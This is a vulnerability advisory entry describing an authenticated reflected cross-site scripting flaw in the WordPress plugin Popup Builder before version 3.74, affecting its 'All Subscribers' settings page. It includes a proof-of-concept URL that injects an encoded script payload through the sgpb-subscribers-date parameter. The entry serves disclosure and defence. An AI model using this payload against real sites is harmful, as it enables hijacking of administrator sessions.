Popup Builder < 3.74 - Authenticated Reflected Cross-Site Scripting (XSS)

2021-02-02T00:00:00
ID WPVDB-ID:597E9686-F4E2-43BF-85EF-C5967E5652BD
Type wpvulndb
Reporter Nguyen Anh Tien
Modified 2021-02-03T06:00:52

Description

The "All Subscribers" setting page of Popup Builder was vulnerable to reflected Cross-Site Scripting.

PoC

http://example.com/wp-admin/edit.php?post_type=popupbuilder&page;=sgpbSubscribers&sgpb-subscribers-date;=%22%3E%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E Video: https://mega.nz/file/H81iGSgC#Ya8zwHd0MuUXaUv61LsRn7HW0wgGOfYN2xvDkWuGCMg